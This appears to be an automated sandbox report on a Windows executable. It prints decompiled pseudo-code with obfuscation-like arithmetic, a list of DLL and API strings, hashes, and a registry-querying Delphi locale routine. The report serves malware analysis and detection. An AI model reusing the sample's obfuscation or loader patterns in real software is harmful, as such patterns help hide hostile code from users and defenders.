                                                									_t1237 = _t872 + 0x30 - E004FEF10; // 0x1cb931c0
                                                									if(_t1237 >= 0) {
                                                										asm("fild dword [ebp-0x30]");
                                                										_v36 = E004048CC();
                                                									} else {
                                                										_v56 = 0;
                                                										while(_v56 < 0xd) {
                                                											_v56 = _v56 + 1;
                                                											 *0x4fef28 = E004F5038( &E004FEF00,  &E004FEF50, 0x4fef04,  &E004FEED0,  &E004FEF38);
                                                										}
                                                										_t882 =  *0x4feef0; // 0x44632301
                                                										 *0x4feef0 = E0040489C(_t882);
                                                									}
                                                									_t875 = E004FEF00; // 0xa3b3f6c0
                                                									 *0x4fef44 = _t875 + 0xb6;
                                                									_t877 =  *0x4fef44; // 0x38993
                                                									 *0x4fef4c = _t877;
                                                									_t878 =  *0x4fef40; // 0x3c79b5d4
                                                									_v708 = _t878 + 0x4d;
                                                									asm("fild dword [ebp-0x2c0]");
                                                									 *0x4feedc = E004048CC();
                                                								}
                                                								E004FEF50 =  *0x4fef04 * 0xab;
                                                								_t843 = E004FEF00; // 0xa3b3f6c0
                                                								 *0x4feedc = _t843 +  *0x4feefc;
                                                								_t845 =  *0x4feee8; // 0xdcd0f434
                                                								 *0x4feee8 = E0040489C(_t845);
                                                								_t847 =  *0x4feecc; // 0xd26bafe0
                                                								E004FEF00 = _t847 << 6;
                                                								E00404814(0,  &_v756, _t1152);
                                                								E00407414( &_v752, _v756);
                                                								E004F37A4(_v752, _t1034,  &_v748, _t1149, _t1150); // executed
                                                								E0040713C( &_v744, _v748, 0x4f9bcc);
                                                								_push(_v744);
                                                								E00407414( &_v760, _v96);
                                                								_pop(_t1119); // executed
                                                								E004F4848(_v760, _t1034,  &_v740, _t1119, _t1149, _t1150, _t1261);
                                                								_t862 =  *0x4feed8; // 0x1cb9338e
                                                								 *0x4feed8 = _t862;
                                                								_v36 = _v56 - _v52;
                                                								_v40 = _v44 + _v32;
                                                								_t867 =  *0x4fef48; // 0xc3c34ef0
                                                								 *0x4fef14 = _t867 * E004FEF00;
                                                								E004FEF34 = 0xff -  *0x4fef44;
                                                								 *0x4fef48 =  *0x4fef40 * 0x64;
                                                							}
                                                							_v708 = _v60 + 4;
                                                							asm("fild dword [ebp-0x2c0]");
                                                							_v40 = E004048D8();
                                                							_v44 = 0;
                                                							if(_v44 < 4) {
                                                								do {
                                                									_v44 = _v44 + 1;
                                                									_v48 = _v52 + _v32;
                                                									_t1242 = _v44 - 4;
                                                								} while (_t1242 < 0);
                                                							}
                                                							_t807 =  *0x4fef04; // 0x43c14963
                                                							E004FEF34 = _t807;
                                                							_t808 =  *0x4fef08; // 0x0
                                                							_t1111 =  *0x4feea8; // 0x0
                                                							E00407640(_t808, _t1111);
                                                							if(_t1242 == 0) {
                                                								_v56 = 0;
                                                								_t1243 = _v56;
                                                								if(_v56 < 0) {
                                                									_v56 = _v56 + 1;
                                                									_push( &_v60);
                                                									_push(0x4feed8);
                                                									_push( &_v60);
                                                									 *0x4feedc = E004F4700(0x4fef28, _t1034,  &E004FEF0C,  &_v52, _t1243);
                                                								}
                                                							}
                                                							E004FEF10 = 0xba -  *0x4feedc;
                                                							_t812 =  *0x4feedc * 0x1e;
                                                							_t1244 = _t812;
                                                							 *0x4fef30 = _t812;
                                                						}
                                                						_t1098 =  *0x4feea0; // 0xa1d900
                                                						_t728 =  *0x4feef0; // 0x44632301
                                                						 *0x4feee8 = E004F5234(_t728, _v52, _t1098, _t1244);
                                                						_v36 = _v40 + 0xe5;
                                                						_v52 = _v48 - _v60;
                                                						_t734 =  *0x4feee8; // 0xdcd0f434
                                                						 *0x4fef04 = _t734;
                                                						if(_v44 - _v36 < 0x84) {
                                                							 *0x4fef30 =  *0x4fef30 - 0xe1;
                                                						}
                                                						_v44 = 0;
                                                						do {
                                                							_t738 =  *0x4feebc; // 0x0
                                                							_v108 = _t738;
                                                							if(_v108 != 0) {
                                                								_v108 =  *((intOrPtr*)(_v108 - 4));
                                                							}
                                                							if(_v108 == 0xf0) {
                                                								_t739 =  *0x4fef3c; // 0x1cb932a9
                                                								 *0x4feecc = _t739;
                                                							}
                                                							_v44 = _v44 + 1;
                                                						} while (_v44 != 7);
                                                					}
                                                					_pop(_t1090);
                                                					 *[fs:eax] = _t1090;
                                                					_push(E004F97F3);
                                                					_v52 = _v44 + 0x82;
                                                					if(_v52 + 0xdd >= _v32) {
                                                						E00406CF4( &_v28, L"shmig.dll");
                                                					} else {
                                                						_v56 = 0;
                                                						while(_v56 < 9) {
                                                							_v56 = _v56 + 1;
                                                							_t696 =  *0x4fef30; // 0xa1d816
                                                							E004FEF50 = _t696;
                                                							_t697 =  *0x4feefc; // 0x4b08dcc7
                                                							 *0x4feecc = _t697;
                                                							_t698 =  *0x4feecc; // 0xd26bafe0
                                                							_t1254 = _t698 - E004FEF50; // 0xa3b3f6c0
                                                							if(_t1254 > 0) {
                                                								_v36 = _v40 + _v60;
                                                							}
                                                						}
                                                						E00407678(_v28, 4, 1,  &_v20);
                                                						_t693 =  *0x4fef3c; // 0x1cb932a9
                                                						_v708 = _t693 + 4;
                                                						asm("fild dword [ebp-0x2c0]");
                                                						 *0x4fef30 = E004048D8();
                                                					}
                                                					E00407678(_v24, 3, 1,  &_v12);
                                                					_t663 =  *0x4feed8; // 0x1cb9338e
                                                					 *0x4feed8 = E0040489C(_t663);
                                                					_t665 =  *0x4feed8; // 0x1cb9338e
                                                					_t1257 = _t665 - E004FEF50; // 0xa3b3f6c0
                                                					if(_t1257 > 0) {
                                                						_t687 =  *0x4feee8; // 0xdcd0f434
                                                						 *0x4feefc = _t687 - 0xc5;
                                                					}
                                                					asm("fild dword [0x4feea0]");
                                                					E004FEF20 = E004048D8();
                                                					_t667 =  *0x4feea0; // 0xa1d900
                                                					E004FEF38 = _t667 *  *0x4feefc;
                                                					E004044D0(_v68);
                                                					_v36 = _v48 - 0xeb;
                                                					E00407678(_v16, 1, 1,  &_v16);
                                                					_v60 = _v52 - 0x1c;
                                                					_t678 = E004FEF34; // 0xc3c34ef0
                                                					 *0x4fef18 = _t678 + 0xec;
                                                					_t680 =  *0x4fef48; // 0xc3c34ef0
                                                					 *0x4fef30 = _t680 - 0xea;
                                                					_t682 =  *0x4fef18; // 0xbc3e19a
                                                					E004FEF38 = _t682;
                                                					_t683 = E004FEF00; // 0xa3b3f6c0
                                                					 *0x4fef3c = _t683;
                                                					_t684 = E004FEF38; // 0xc3c34fdc
                                                					_t1259 = _t684 -  *0x4fef3c; // 0x1cb932a9
                                                					if(_t1259 < 0) {
                                                						_t685 =  *0x4feee0; // 0x747938b
                                                						_t686 = _t685 - 0xe7;
                                                						 *0x4feecc = _t686;
                                                						return _t686;
                                                					}
                                                					return _t684;
                                                				}
                                                			}





































































































































































































































                                                0x004f84e8
                                                0x004f84e8
                                                0x004f84e8
                                                0x004f84e8
                                                0x004f84e9
                                                0x004f84eb
                                                0x004f84f0
                                                0x004f84f0
                                                0x004f84f2
                                                0x004f84f4
                                                0x004f84f4
                                                0x004f84f7
                                                0x004f84f8
                                                0x004f84f9
                                                0x004f84fa
                                                0x004f84fb
                                                0x004f8500
                                                0x004f8501
                                                0x004f8506
                                                0x004f8509
                                                0x004f8510
                                                0x004f993e
                                                0x004f9940
                                                0x004f9943
                                                0x004f9946
                                                0x004f9951
                                                0x004f995c
                                                0x004f996c
                                                0x004f9977
                                                0x004f9982
                                                0x004f9992
                                                0x004f999f
                                                0x004f99b1
                                                0x004f8516
                                                0x004f851e
                                                0x004f8521
                                                0x004f8529
                                                0x004f8537
                                                0x004f8556
                                                0x004f8561
                                                0x004f8539
                                                0x004f853b
                                                0x004f853e
                                                0x004f8546
                                                0x004f854b
                                                0x004f854e
                                                0x004f854e
                                                0x004f853e
                                                0x004f8569
                                                0x004f856d
                                                0x004f8571
                                                0x004f8572
                                                0x004f857e
                                                0x004f8598
                                                0x004f859a
                                                0x004f85a5
                                                0x004f85a5
                                                0x004f85ac
                                                0x004f85ad
                                                0x004f85b2
                                                0x004f85b5
                                                0x004f85b8
                                                0x004f85bd
                                                0x004f85c2
                                                0x004f85cc
                                                0x004f85d9
                                                0x004f85e2
                                                0x004f85e8
                                                0x004f85f3
                                                0x004f85f6
                                                0x004f85fe
                                                0x004f8603
                                                0x004f860e
                                                0x004f8613
                                                0x004f861c
                                                0x004f861f
                                                0x004f8625
                                                0x004f8635
                                                0x004f865d
                                                0x004f865d
                                                0x004f8660
                                                0x004f8637
                                                0x004f8653
                                                0x004f8653
                                                0x004f8663
                                                0x004f8668
                                                0x004f866f
                                                0x004f8676
                                                0x004f8678
                                                0x004f867b
                                                0x004f8686
                                                0x004f868c
                                                0x004f86ae
                                                0x004f86b3
                                                0x004f86b3
                                                0x004f86b9
                                                0x004f868e
                                                0x004f8690
                                                0x004f8697
                                                0x004f8699
                                                0x004f869c
                                                0x004f86a1
                                                0x004f86a6
                                                0x004f8697
                                                0x004f86be
                                                0x004f86c4
                                                0x004f86c7
                                                0x004f86dc
                                                0x004f86df
                                                0x004f86e1
                                                0x004f86e6
                                                0x004f86ee
                                                0x004f86f4
                                                0x004f86fe
                                                0x004f8703
                                                0x004f870c
                                                0x004f870c
                                                0x004f8711
                                                0x004f8716
                                                0x004f871b
                                                0x004f8720
                                                0x004f8725
                                                0x004f872a
                                                0x004f8730
                                                0x004f8744
                                                0x004f874e
                                                0x004f8732
                                                0x004f8732
                                                0x004f873d
                                                0x004f873d
                                                0x004f875d
                                                0x004f8762
                                                0x004f876a
                                                0x004f8775
                                                0x004f8778
                                                0x004f8780
                                                0x004f878f
                                                0x004f879d
                                                0x004f879f
                                                0x004f87aa
                                                0x004f87aa
                                                0x004f87af
                                                0x004f87b4
                                                0x004f87b9
                                                0x004f87be
                                                0x004f87c3
                                                0x004f87c8
                                                0x004f87cd
                                                0x004f87d3
                                                0x004f87d7
                                                0x004f87de
                                                0x004f87e0
                                                0x004f87eb
                                                0x004f87f0
                                                0x004f87de
                                                0x004f87f8
                                                0x004f87ff
                                                0x004f8801
                                                0x004f880a
                                                0x004f880d
                                                0x004f8819
                                                0x004f881c
                                                0x004f8821
                                                0x004f8826
                                                0x004f8830
                                                0x004f8846
                                                0x004f884d
                                                0x004f8850
                                                0x004f8856
                                                0x004f885f
                                                0x004f8862
                                                0x004f8867
                                                0x004f886c
                                                0x004f8874
                                                0x004f8879
                                                0x004f8883
                                                0x004f888e
                                                0x004f8893
                                                0x004f88a3
                                                0x004f88aa
                                                0x004f88ad
                                                0x004f88c0
                                                0x004f88c3
                                                0x004f88ce
                                                0x004f88d4
                                                0x004f8936
                                                0x004f893b
                                                0x004f893b
                                                0x004f8941
                                                0x004f88d6
                                                0x004f88de
                                                0x004f88e9
                                                0x004f88f0
                                                0x004f88f3
                                                0x004f8901
                                                0x004f8905
                                                0x004f8908
                                                0x004f8908
                                                0x004f890d
                                                0x004f8912
                                                0x004f8915
                                                0x004f8908
                                                0x004f891b
                                                0x004f891e
                                                0x004f8924
                                                0x004f892f
                                                0x004f892f
                                                0x004f8946
                                                0x004f8951
                                                0x004f8956
                                                0x004f8961
                                                0x004f8966
                                                0x004f896b
                                                0x004f897b
                                                0x004f898a
                                                0x004f898d
                                                0x004f8998
                                                0x004f899e
                                                0x004f89a2
                                                0x004f89a9
                                                0x004f89ab
                                                0x004f89b6
                                                0x004f89bb
                                                0x004f89c7
                                                0x004f89c7
                                                0x004f89d2
                                                0x004f89dd
                                                0x004f89e6
                                                0x004f89fa
                                                0x004f89ff
                                                0x004f89ff
                                                0x004f8a02
                                                0x004f89e8
                                                0x004f89e8
                                                0x004f89f3
                                                0x004f89f3
                                                0x004f8a07
                                                0x004f8a0f
                                                0x004f8a15
                                                0x004f8a20
                                                0x004f8a25
                                                0x004f8a2f
                                                0x004f8a3e
                                                0x004f8a43
                                                0x004f8a4a
                                                0x004f8a4c
                                                0x004f8a4f
                                                0x004f8a54
                                                0x004f8a5b
                                                0x004f8a65
                                                0x004f8a65
                                                0x004f8a6f
                                                0x004f8a7d
                                                0x004f8a82
                                                0x004f8a71
                                                0x004f8a71
                                                0x004f8a76
                                                0x004f8a76
                                                0x004f8a87
                                                0x004f8a8d
                                                0x004f8a92
                                                0x004f8a9d
                                                0x004f8aa0
                                                0x004f8aa5
                                                0x004f8aac
                                                0x004f8ab3
                                                0x004f8ab5
                                                0x004f8ab8
                                                0x004f8ac3
                                                0x004f8ad1
                                                0x004f8af8
                                                0x004f8afe
                                                0x004f8ad3
                                                0x004f8ad5
                                                0x004f8adc
                                                0x004f8ade
                                                0x004f8ae1
                                                0x004f8ae6
                                                0x004f8aeb
                                                0x004f8adc
                                                0x004f8b03
                                                0x004f8b09
                                                0x004f8b14
                                                0x004f8b1b
                                                0x004f8b1c
                                                0x004f8b21
                                                0x004f8b24
                                                0x004f8b2f
                                                0x004f8b34
                                                0x004f8b3b
                                                0x004f8b41
                                                0x004f8b4a
                                                0x004f8b50
                                                0x004f8b5b
                                                0x004f8b60
                                                0x004f8b67
                                                0x004f8b69
                                                0x004f8b6c
                                                0x004f8b77
                                                0x004f8b77
                                                0x004f8b84
                                                0x004f8b89
                                                0x004f8b8e
                                                0x004f8b98
                                                0x004f8b9d
                                                0x004f8ba2
                                                0x004f8ba8
                                                0x004f8baa
                                                0x004f8bb5
                                                0x004f8bb5
                                                0x004f8bba
                                                0x004f8bc5
                                                0x004f8bca
                                                0x004f8bca
                                                0x004f8bd4
                                                0x004f8bde
                                                0x004f8be3
                                                0x004f8be8
                                                0x004f8bed
                                                0x004f8bf7
                                                0x004f8bfd
                                                0x004f8c08
                                                0x004f8c10
                                                0x004f8c14
                                                0x004f8c15
                                                0x004f8c1d
                                                0x004f8c2a
                                                0x004f8c3d
                                                0x004f8c43
                                                0x004f8c44
                                                0x004f8c45
                                                0x004f8c49
                                                0x004f8c54
                                                0x004f8c56
                                                0x004f8c56
                                                0x004f8c5b
                                                0x004f8c63
                                                0x004f8c66
                                                0x004f8c77
                                                0x004f8c7c
                                                0x004f8c81
                                                0x004f8c86
                                                0x004f8c8b
                                                0x004f8c90
                                                0x004f8c95
                                                0x004f8c9b
                                                0x004f8ca3
                                                0x004f8ca3
                                                0x004f8cac
                                                0x004f8cb7
                                                0x004f8cbc
                                                0x004f8cbf
                                                0x004f8cc5
                                                0x004f8ccf
                                                0x004f8cd4
                                                0x004f8cdc
                                                0x004f8ce2
                                                0x004f8ced
                                                0x004f8cf2
                                                0x004f8cfc
                                                0x004f8d01
                                                0x004f8d09
                                                0x004f8d0e
                                                0x004f8d16
                                                0x004f8d1d
                                                0x004f8d20
                                                0x004f8d25
                                                0x004f8d38
                                                0x004f8d48
                                                0x004f8d48
                                                0x004f8d4b
                                                0x004f8d54
                                                0x004f8d3a
                                                0x004f8d40
                                                0x004f8d40
                                                0x004f8d59
                                                0x004f8d61
                                                0x004f8d67
                                                0x004f8d72
                                                0x004f8d7d
                                                0x004f8d8a
                                                0x004f8d8f
                                                0x004f8d94
                                                0x004f8d99
                                                0x004f8d9e
                                                0x004f8da3
                                                0x004f8dab
                                                0x004f8daf
                                                0x004f8db2
                                                0x004f8dbc
                                                0x004f8dc4
                                                0x004f8dc9
                                                0x004f8dd0
                                                0x004f8dd2
                                                0x004f8dd7
                                                0x004f8dde
                                                0x004f8de0
                                                0x004f8df4
                                                0x004f8df9
                                                0x004f8dff
                                                0x004f8e04
                                                0x004f8e09
                                                0x004f8e0e
                                                0x004f8e13
                                                0x004f8e19
                                                0x004f8e1e
                                                0x004f8e23
                                                0x004f8e2b
                                                0x004f8e30
                                                0x004f8e35
                                                0x004f8e35
                                                0x004f8e38
                                                0x004f8e3d
                                                0x004f8e42
                                                0x004f8e42
                                                0x004f8e6b
                                                0x004f8e78
                                                0x004f8e7d
                                                0x004f8e80
                                                0x004f8e84
                                                0x004f8e86
                                                0x004f8e8f
                                                0x004f8e8f
                                                0x004f8e9a
                                                0x004f8ea5
                                                0x004f8eaa
                                                0x004f8eb0
                                                0x004f8ebe
                                                0x004f8ec3
                                                0x004f8ed1
                                                0x004f8ee1
                                                0x004f8eec
                                                0x004f8ef1
                                                0x004f8ef8
                                                0x004f8efa
                                                0x004f8efd
                                                0x004f8f08
                                                0x004f8f0d
                                                0x004f8f0d
                                                0x004f8f13
                                                0x004f8f18
                                                0x004f8f20
                                                0x004f8f21
                                                0x004f8f2a
                                                0x004f8f34
                                                0x004f8f39
                                                0x004f8f41
                                                0x004f8f46
                                                0x004f8f50
                                                0x004f8f65
                                                0x004f8f6c
                                                0x004f8f72
                                                0x004f8f77
                                                0x004f8f7c
                                                0x004f8f86
                                                0x004f8f8b
                                                0x004f8f90
                                                0x004f8f96
                                                0x004f8fde
                                                0x004f8fe3
                                                0x004f8fe3
                                                0x004f8fe6
                                                0x004f8f98
                                                0x004f8f9a
                                                0x004f8f9d
                                                0x004f8f9d
                                                0x004f8fa2
                                                0x004f8fa7
                                                0x004f8faa
                                                0x004f8fb6
                                                0x004f8fbb
                                                0x004f8fc2
                                                0x004f8fc4
                                                0x004f8fc7
                                                0x004f8fd1
                                                0x004f8fd6
                                                0x004f8fc2
                                                0x004f8feb
                                                0x004f8ff6
                                                0x004f8ffc
                                                0x004f9010
                                                0x004f9015
                                                0x004f9015
                                                0x004f901b
                                                0x004f902f
                                                0x004f8ffe
                                                0x004f8ffe
                                                0x004f9009
                                                0x004f9009
                                                0x004f9034
                                                0x004f903f
                                                0x004f9044
                                                0x004f904e
                                                0x004f9053
                                                0x004f905b
                                                0x004f9063
                                                0x004f9064
                                                0x004f906c
                                                0x004f907d
                                                0x004f90a1
                                                0x004f90ad
                                                0x004f90b8
                                                0x004f90bb
                                                0x004f90c6
                                                0x004f90cb
                                                0x004f90d5
                                                0x004f90db
                                                0x004f90e6
                                                0x004f90eb
                                                0x004f90f5
                                                0x004f90fa
                                                0x004f90ff
                                                0x004f9104
                                                0x004f9109
                                                0x004f910f
                                                0x004f9148
                                                0x004f914d
                                                0x004f9152
                                                0x004f9157
                                                0x004f915d
                                                0x004f91a4
                                                0x004f915f
                                                0x004f915f
                                                0x004f9169
                                                0x004f916e
                                                0x004f9173
                                                0x004f9179
                                                0x004f918d
                                                0x004f9197
                                                0x004f917b
                                                0x004f917b
                                                0x004f9186
                                                0x004f9186
                                                0x004f9179
                                                0x004f9111
                                                0x004f9126
                                                0x004f9136
                                                0x004f9141
                                                0x004f9128
                                                0x004f912f
                                                0x004f912f
                                                0x004f9126
                                                0x004f91a9
                                                0x004f91b1
                                                0x004f91be
                                                0x004f91cf
                                                0x004f91e0
                                                0x004f91f0
                                                0x004f91fe
                                                0x004f9205
                                                0x004f9208
                                                0x004f9210
                                                0x004f9215
                                                0x004f9218
                                                0x004f9220
                                                0x004f9223
                                                0x004f922b
                                                0x004f9234
                                                0x004f923a
                                                0x004f9245
                                                0x004f9248
                                                0x004f924b
                                                0x004f924b
                                                0x004f9251
                                                0x004f9259
                                                0x004f9263
                                                0x004f9268
                                                0x004f926d
                                                0x004f9272
                                                0x004f927c
                                                0x004f9287
                                                0x004f9292
                                                0x004f929d
                                                0x004f92a6
                                                0x004f92a9
                                                0x004f92ae
                                                0x004f92b3
                                                0x004f92b8
                                                0x004f92bd
                                                0x004f92c5
                                                0x004f92cb
                                                0x004f92d6
                                                0x004f92e4
                                                0x004f92f5
                                                0x004f92fc
                                                0x004f930a
                                                0x004f930d
                                                0x004f9312
                                                0x004f931d
                                                0x004f9320
                                                0x004f9328
                                                0x004f932e
                                                0x004f9339
                                                0x004f933e
                                                0x004f9343
                                                0x004f934a
                                                0x004f934f
                                                0x004f9354
                                                0x004f9364
                                                0x004f936a
                                                0x004f9372
                                                0x004f937b
                                                0x004f9380
                                                0x004f942d
                                                0x004f9432
                                                0x004f9437
                                                0x004f9437
                                                0x004f943d
                                                0x004f9386
                                                0x004f9386
                                                0x004f938e
                                                0x004f9394
                                                0x004f93de
                                                0x004f93e6
                                                0x004f9396
                                                0x004f9398
                                                0x004f939f
                                                0x004f93a1
                                                0x004f93c2
                                                0x004f93c7
                                                0x004f93cd
                                                0x004f93d7
                                                0x004f93d7
                                                0x004f93e9
                                                0x004f93f3
                                                0x004f93f8
                                                0x004f93fd
                                                0x004f9402
                                                0x004f940a
                                                0x004f9410
                                                0x004f941b
                                                0x004f941b
                                                0x004f944c
                                                0x004f9451
                                                0x004f945c
                                                0x004f9461
                                                0x004f946b
                                                0x004f9470
                                                0x004f9478
                                                0x004f9485
                                                0x004f9496
                                                0x004f94a7
                                                0x004f94bd
                                                0x004f94c8
                                                0x004f94d2
                                                0x004f94e3
                                                0x004f94e4
                                                0x004f94e9
                                                0x004f94ee
                                                0x004f94f9
                                                0x004f9502
                                                0x004f9505
                                                0x004f9510
                                                0x004f9520
                                                0x004f952c
                                                0x004f952c
                                                0x004f9537
                                                0x004f953d
                                                0x004f9548
                                                0x004f954d
                                                0x004f9554
                                                0x004f9556
                                                0x004f9556
                                                0x004f955f
                                                0x004f9562
                                                0x004f9562
                                                0x004f9556
                                                0x004f9568
                                                0x004f956d
                                                0x004f9572
                                                0x004f9577
                                                0x004f957d
                                                0x004f9582
                                                0x004f9586
                                                0x004f9589
                                                0x004f958d
                                                0x004f958f
                                                0x004f9595
                                                0x004f9596
                                                0x004f959e
                                                0x004f95b1
                                                0x004f95b1
                                                0x004f958d
                                                0x004f95c9
                                                0x004f95ce
                                                0x004f95ce
                                                0x004f95d5
                                                0x004f95d5
                                                0x004f95dd
                                                0x004f95e3
                                                0x004f95ed
                                                0x004f95fa
                                                0x004f9603
                                                0x004f9606
                                                0x004f960b
                                                0x004f961b
                                                0x004f961d
                                                0x004f961d
                                                0x004f9629
                                                0x004f962c
                                                0x004f962c
                                                0x004f9631
                                                0x004f9638
                                                0x004f9642
                                                0x004f9642
                                                0x004f964c
                                                0x004f964e
                                                0x004f9653
                                                0x004f9653
                                                0x004f9658
                                                0x004f965b
                                                0x004f962c
                                                0x004f9663
                                                0x004f9666
                                                0x004f9669
                                                0x004f9676
                                                0x004f9684
                                                0x004f9702
                                                0x004f9686
                                                0x004f9688
                                                0x004f968f
                                                0x004f9691
                                                0x004f9694
                                                0x004f9699
                                                0x004f969e
                                                0x004f96a3
                                                0x004f96a8
                                                0x004f96ad
                                                0x004f96b3
                                                0x004f96bb
                                                0x004f96bb
                                                0x004f96be
                                                0x004f96d5
                                                0x004f96da
                                                0x004f96e2
                                                0x004f96e8
                                                0x004f96f3
                                                0x004f96f3
                                                0x004f9718
                                                0x004f971d
                                                0x004f9727
                                                0x004f972c
                                                0x004f9731
                                                0x004f9737
                                                0x004f9739
                                                0x004f9743
                                                0x004f9743
                                                0x004f9748
                                                0x004f9753
                                                0x004f9758
                                                0x004f9763
                                                0x004f976b
                                                0x004f9778
                                                0x004f978c
                                                0x004f9797
                                                0x004f979a
                                                0x004f97a4
                                                0x004f97a9
                                                0x004f97b3
                                                0x004f97b8
                                                0x004f97bd
                                                0x004f97c2
                                                0x004f97c7
                                                0x004f97cc
                                                0x004f97d1
                                                0x004f97d7
                                                0x004f97d9
                                                0x004f97de
                                                0x004f97e3
                                                0x00000000
                                                0x004f97e3
                                                0x004f97e8
                                                0x004f97e8

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID: $$O$.dll$AlpcGetMessageAttribute$D3DCompiler_47.dll$DO$EP0NRE9C.DLL$QueryTraceA$RegDeleteKeyW$SetProcessAffinityMask$ZwQueryOpenSubKeys$ZwYieldExecution$logscrpt.dll$shmig.dll$sspicli.dll$vpnikeapi.dll
                                                • API String ID: 0-2387494972
                                                • Opcode ID: 153290a803969b51b322323f0b52c91d6443626fb3ec939816f13861025abb15
                                                • Instruction ID: a6f21e26090de89f52c20706870a5f057079cda2a9eef0185e01c3a742549dac
                                                • Opcode Fuzzy Hash: 153290a803969b51b322323f0b52c91d6443626fb3ec939816f13861025abb15
                                                • Instruction Fuzzy Hash: 37D2F671910249EFDB00DFAAE984AADB7F1FB08306F10447AE505E7275D738A961CF29
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 78%
                                                			E0040918C(char __eax, void* __ebx, void* __ecx, void* __edx) {
                                                				char _v8;
                                                				char* _v12;
                                                				void* _v16;
                                                				int _v20;
                                                				short _v542;
                                                				long _t51;
                                                				long _t85;
                                                				long _t87;
                                                				long _t89;
                                                				long _t91;
                                                				long _t93;
                                                				void* _t97;
                                                				intOrPtr _t106;
                                                				intOrPtr _t108;
                                                				void* _t112;
                                                				void* _t113;
                                                				intOrPtr _t114;
                                                
                                                				_t112 = _t113;
                                                				_t114 = _t113 + 0xfffffde4;
                                                				_t97 = __edx;
                                                				_v8 = __eax;
                                                				E00406A8C(_v8);
                                                				_push(_t112);
                                                				_push(0x4093b1);
                                                				_push( *[fs:eax]);
                                                				 *[fs:eax] = _t114;
                                                				if(_v8 != 0) {
                                                					E004089C0( &_v542, E00407330(_v8), 0x105);
                                                				} else {
                                                					GetModuleFileNameW(0,  &_v542, 0x105);
                                                				}
                                                				if(_v542 == 0) {
                                                					L18:
                                                					_pop(_t106);
                                                					 *[fs:eax] = _t106;
                                                					_push(E004093B8);
                                                					return E004069A8( &_v8);
                                                				} else {
                                                					_v12 = 0;
                                                					_t51 = RegOpenKeyExW(0x80000001, L"Software\\Embarcadero\\Locales", 0, 0xf0019,  &_v16); // executed
                                                					if(_t51 == 0) {
                                                						L10:
                                                						_push(_t112);
                                                						_push(0x409394);
                                                						_push( *[fs:eax]);
                                                						 *[fs:eax] = _t114;
                                                						E00408F9C( &_v542, 0x105);
                                                						if(RegQueryValueExW(_v16,  &_v542, 0, 0, 0,  &_v20) != 0) {
                                                							if(RegQueryValueExW(_v16, 0x4094a4, 0, 0, 0,  &_v20) == 0) {
                                                								_v12 = E004044B4(_v20);
                                                								RegQueryValueExW(_v16, 0x4094a4, 0, 0, _v12,  &_v20);
                                                								E00407388(_t97, _v12);
                                                							}
                                                						} else {
                                                							_v12 = E004044B4(_v20);
                                                							RegQueryValueExW(_v16,  &_v542, 0, 0, _v12,  &_v20);
                                                							E00407388(_t97, _v12);
                                                						}
                                                						_pop(_t108);
                                                						 *[fs:eax] = _t108;
                                                						_push(0x40939b);
                                                						if(_v12 != 0) {
                                                							E004044D0(_v12);
                                                						}
                                                						return RegCloseKey(_v16);
                                                					} else {
                                                						_t85 = RegOpenKeyExW(0x80000002, L"Software\\Embarcadero\\Locales", 0, 0xf0019,  &_v16); // executed
                                                						if(_t85 == 0) {
                                                							goto L10;
                                                						} else {
                                                							_t87 = RegOpenKeyExW(0x80000001, L"Software\\CodeGear\\Locales", 0, 0xf0019,  &_v16); // executed
                                                							if(_t87 == 0) {
                                                								goto L10;
                                                							} else {
                                                								_t89 = RegOpenKeyExW(0x80000002, L"Software\\CodeGear\\Locales", 0, 0xf0019,  &_v16); // executed
                                                								if(_t89 == 0) {
                                                									goto L10;
                                                								} else {
                                                									_t91 = RegOpenKeyExW(0x80000001, L"Software\\Borland\\Locales", 0, 0xf0019,  &_v16); // executed
                                                									if(_t91 == 0) {
                                                										goto L10;
                                                									} else {
                                                										_t93 = RegOpenKeyExW(0x80000001, L"Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v16); // executed
                                                										if(_t93 != 0) {
                                                											goto L18;
                                                										} else {
                                                											goto L10;
                                                										}
                                                									}
                                                								}
                                                							}
                                                						}
                                                					}
                                                				}
                                                			}




















                                                0x0040918d
                                                0x0040918f
                                                0x00409196
                                                0x00409198
                                                0x0040919e
                                                0x004091a5
                                                0x004091a6
                                                0x004091ab
                                                0x004091ae
                                                0x004091b5
                                                0x004091e1
                                                0x004091b7
                                                0x004091c5
                                                0x004091c5
                                                0x004091ee
                                                0x0040939b
                                                0x0040939d
                                                0x004093a0
                                                0x004093a3
                                                0x004093b0
                                                0x004091f4
                                                0x004091f6
                                                0x0040920e
                                                0x00409215
                                                0x004092b5
                                                0x004092b7
                                                0x004092b8
                                                0x004092bd
                                                0x004092c0
                                                0x004092ce
                                                0x004092ef
                                                0x0040933e
                                                0x00409348
                                                0x00409360
                                                0x0040936a
                                                0x0040936a
                                                0x004092f1
                                                0x004092f9
                                                0x00409313
                                                0x0040931d
                                                0x0040931d
                                                0x00409371
                                                0x00409374
                                                0x00409377
                                                0x00409380
                                                0x00409385
                                                0x00409385
                                                0x00409393
                                                0x0040921b
                                                0x00409230
                                                0x00409237
                                                0x00000000
                                                0x00409239
                                                0x0040924e
                                                0x00409255
                                                0x00000000
                                                0x00409257
                                                0x0040926c
                                                0x00409273
                                                0x00000000
                                                0x00409275
                                                0x0040928a
                                                0x00409291
                                                0x00000000
                                                0x00409293
                                                0x004092a8
                                                0x004092af
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004092af
                                                0x00409291
                                                0x00409273
                                                0x00409255
                                                0x00409237
                                                0x00409215

                                                APIs
                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,004093B1,?,?), ref: 004091C5
                                                • RegOpenKeyExW.ADVAPI32(80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,004093B1,?,?), ref: 0040920E
                                                • RegOpenKeyExW.ADVAPI32(80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,004093B1,?,?), ref: 00409230
